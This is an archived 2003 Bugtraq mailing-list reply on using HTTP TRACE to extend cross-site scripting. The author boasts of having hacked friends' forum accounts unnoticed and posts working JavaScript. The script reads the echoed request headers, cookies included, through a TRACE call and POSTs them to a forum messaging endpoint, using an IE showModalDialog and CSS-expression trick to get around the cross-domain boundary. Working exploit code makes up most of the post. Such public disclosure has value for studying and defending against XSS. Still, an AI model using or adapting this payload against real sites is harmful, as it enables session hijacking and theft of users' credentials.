[28614] in bugtraq
Re: TRACE used to increase the dangerous of XSS.
daemon@ATHENA.MIT.EDU (Phrack)
Fri Jan 24 13:20:49 2003
Message-ID: <000901c2c345$1c60f070$1d00a8c0@chenhaiyan>
From: "Phrack" <security@fooyu.com>
To: <jeremiah@whitehatsec.com>, <bugtraq@securityfocus.com>,
<webappsec@securityfocus.com>, <vulnwatch@vulnwatch.org>
Date: Fri, 24 Jan 2003 09:08:28 +0800
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
It's really a terrible security hole. Using this method, I have hacked some BBS account of my friends. If you do it properly, it wouldn't be noticed by victim. The following is my code:
<script type="text/javascript">
function xssDomainTraceRequest(){
var exampleCode = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\")\;xmlHttp.open(\"TRACE\",\"http://bbs.for.bar\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;xmlHttp.open(\"POST\",\"http://bbs.for.bar/member.php\",false)\;xmlHttp.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\")\;xmlHttp.send(\"s=&action=emailmessage&userid=11111&subject=test&message=\" + xmlDoc)\;";
var target = "http://bbs.for.bar";
cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';
showModalDialog(target, null, readyCode);
}
</script>
<script>
xssDomainTraceRequest();
</script>
Chen haiyan, CISSP
System Security Engineer
HENAN CFONLINE COMMERCE CO., LTD.
